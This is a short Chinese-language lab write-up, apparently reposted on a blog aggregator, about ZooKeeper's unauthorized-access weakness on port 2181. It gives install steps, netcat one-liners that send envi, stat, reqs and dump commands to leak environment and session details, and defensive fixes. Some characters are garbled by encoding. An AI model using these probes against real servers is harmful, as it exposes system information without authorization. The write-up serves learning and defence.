漏洞簡介

• ZooKeeper是一個分布式的，開放源碼的分布式應用程序協(xié)調(diào)服務，是Google的Chubby一個開源的實現(xiàn)，是Hadoop和Hbase的重要組件。它是一個為分布式應用提供一致性服務的軟件，提供的功能包括：配置維護、域名服務、分布式同步、組服務等。
• ZooKeeper默認開啟在2181端口，在未進行任何訪問控制情況下，攻擊者可通過執(zhí)行envi命令獲得系統(tǒng)大量的敏感信息，包括系統(tǒng)名稱、Java環(huán)境。

環(huán)境搭建

測試機：Kali
靶機：Ubuntu
版本：zookeeper-3.4.14

安裝命令如下：

mwget http://archive.apache.org/dist/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz tar -xzvf zookeeper-3.4.14.tar.gz cd zookeeper-3.4.14/conf mv zoo_sample.cfg zoo.cfg ../bin/zkServer.sh start # 啟動

搭建成功~~默認端口2181

漏洞證明

獲取該服務器的環(huán)境

echo envi|nc 192.168.246.130 2181

漏洞利用

通過執(zhí)行envi命令獲得系統(tǒng)大量的敏感信息，包括系統(tǒng)名稱、Java環(huán)境。
1、stat：列出關于性能和連接的客戶端的統(tǒng)計信息。

echo stat |ncat 127.0.0.1 2181

2、ruok：測試服務器是否運行在非錯誤狀態(tài)。

echo ruok |ncat 127.0.0.1 2181

3、reqs：列出未完成的請求。

echo reqs |ncat 127.0.0.1 2181

4、envi：打印有關服務環(huán)境的詳細信息。

echo envi |ncat 127.0.0.1 2181

5、dump：列出未完成的會話和臨時節(jié)點。

echo dump |ncat 127.0.0.1 2181

防御手段

1、修改 ZooKeeper 默認端口，采用其他端口服務。
2、添加訪問控制，配置服務來源地址限制策略。
3、增加 ZooKeeper 的認證配置。

總結

以上是生活随笔為你收集整理的ZooKeeper未授权访问漏洞记录（影响范围:全版本，端口:2181）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。